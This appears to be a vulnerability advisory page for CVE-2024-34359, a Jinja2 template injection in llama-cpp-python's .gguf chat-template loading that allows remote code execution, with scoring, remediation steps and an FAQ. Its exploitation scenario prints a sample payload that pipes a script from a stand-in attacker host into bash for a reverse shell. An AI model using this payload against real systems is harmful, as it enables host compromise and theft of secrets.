CVE-2024-34359: llama-cpp-python: SSTI in .gguf loader enables RCE

CRITICAL PoC AVAILABLE CISA: ATTEND
Published May 14, 2024
CISO Take

Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.

Risk Assessment

Critical exposure for all llama-cpp-python deployments. CVSS 9.6 with network vector and low complexity means this is trivially weaponizable once a malicious .gguf is in circulation. The 'User Interaction Required' flag is misleading in AI/ML contexts — loading new models is routine workflow for developers, MLOps, and researchers, making this practically no barrier. Scope change (C:H/I:H/A:H) means full host takeover, not just model compromise. No evidence of active KEV exploitation at time of publication, but model-as-attack-vector is a maturing supply chain threat with high probability of real-world abuse.

Severity & Risk

CVSS 3.1
9.6 / 10
EPSS
39.4%
chance of exploitation in 30 days
Higher than 97% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
EPSS exploit prediction: 39%
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Changed
C High
I High
A High

Recommended Action

6 steps
  1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.

  2. Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries.

  3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.

  4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers).

  5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.

  6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 23 - Obligations of providers of general-purpose AI models
ISO 42001
A.6.2.5 - AI system security A.8.1 - AI supplier relationships
NIST AI RMF
GOVERN 5.2 - AI supply chain and third-party risk management MANAGE 2.4 - Risks from AI system components and dependencies
OWASP LLM Top 10
LLM03 - Supply Chain

Frequently Asked Questions

What is CVE-2024-34359?

Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.

Is CVE-2024-34359 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-34359, increasing the risk of exploitation.

How to fix CVE-2024-34359?

1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing. 2. Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries. 3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files. 4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers). 5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry. 6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.

What systems are affected by CVE-2024-34359?

This vulnerability affects the following AI/ML architecture patterns: local LLM inference, model serving APIs, LLM application frameworks, AI development workstations, MLOps and CI/CD pipelines.

What is the CVSS score for CVE-2024-34359?

CVE-2024-34359 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 39.41%.

Technical Details

NVD Description

llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.

Exploitation Scenario

An adversary uploads a malicious .gguf model to Hugging Face under a convincing namespace (e.g., a typosquat of a popular model). The model's metadata contains a crafted chat_template field with a Jinja2 payload exploiting Python's object introspection: `{{ ''.__class__.__mro__[2].__subclasses__()[XXX]('curl attacker.com/shell.sh | bash', shell=True, ...) }}`. An ML engineer discovers the model via a search or dependency, pulls it for benchmarking, and calls `Llama(model_path='malicious.gguf')`. At instantiation — before any prompts are sent — the template is parsed and rendered in an unsandboxed environment, executing the payload. The adversary receives a reverse shell on the inference host with the privileges of the Python process, gaining access to GPU resources, environment secrets, and internal APIs.

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Timeline

Published
May 14, 2024
Last Modified
November 21, 2024
First Seen
May 14, 2024

Related Vulnerabilities